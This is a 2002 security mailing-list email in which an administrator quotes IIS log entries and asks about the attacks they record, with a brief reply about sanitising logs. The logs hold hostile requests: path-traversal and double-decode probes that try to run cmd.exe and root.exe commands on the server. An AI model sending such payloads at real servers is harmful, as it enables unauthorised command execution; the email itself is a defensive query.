Your best idea when posting to this list is to santize the logs. If you feel funny about posting your IP sir, simply take out the address. A quick script with GREP or PERL would suffice. ;)
"Buffer Overflow in /dev/stomach due to vodka.o!" >From: Jim Grossl <[EMAIL PROTECTED]> >To: [EMAIL PROTECTED] >Subject: IIS log files, can I have your take on these attacks? >Date: Tue, 15 Jan 2002 09:23:32 -0700 >MIME-Version: 1.0 >Received: from [66.38.151.26] by hotmail.com (3.2) with ESMTP id >MHotMailBE0F5B65001D4004370C4226971A9E3B0; Wed, 16 Jan 2002 15:44:42 -0800 >Received: from lists.securityfocus.com (lists.securityfocus.com >[66.38.151.19])by outgoing.securityfocus.com (Postfix) with QMQPid >0999E8F338; Wed, 16 Jan 2002 11:02:36 -0700 (MST) >Received: (qmail 20663 invoked from network); 15 Jan 2002 16:23:12 -0000 >From security-basics-return-7498-stauph Wed, 16 Jan 2002 15:45:15 -0800 >Mailing-List: contact [EMAIL PROTECTED]; run by ezmlm >Precedence: bulk >List-Id: <security-basics.list-id.securityfocus.com> >List-Post: <mailto:[EMAIL PROTECTED]> >List-Help: <mailto:[EMAIL PROTECTED]> >List-Unsubscribe: <mailto:[EMAIL PROTECTED]> >List-Subscribe: <mailto:[EMAIL PROTECTED]> >Delivered-To: mailing list [EMAIL PROTECTED] >Delivered-To: moderator for [EMAIL PROTECTED] >Message-ID: <17C97B6FF0C9D311939B00105A018D5115AB46@SUBWAY> >X-Mailer: Internet Mail Service (5.5.2655.55) > > > >207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] > "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 3396 > >207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] > "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 3396 > >207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] > "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396 > >207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] > "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396 > >207.225.190.149 -- [14/Jan/2002:10:30:23 -0700] > "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 401 3837 > >207.225.190.149 - - [14/Jan/2002:10:30:25 -0700] > "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396 > > > >I kind of bothers me to post these on an open list (apparently >our Web server doesn't need any more "attention") but >I would like to know what everyone thinks of these attacks. My >Web server logged > 2000 of these attacks over the weekend. I'm >pretty sure that attacks are not succeeding, but I've read that >if the "%5c" shows up in the Double Decode attack that the file >traversal is taking place. Thanks. > >Jim Grossl _________________________________________________________________ MSN Photos is the easiest way to share and print your photos: http://photos.msn.com/support/worldwide.aspx
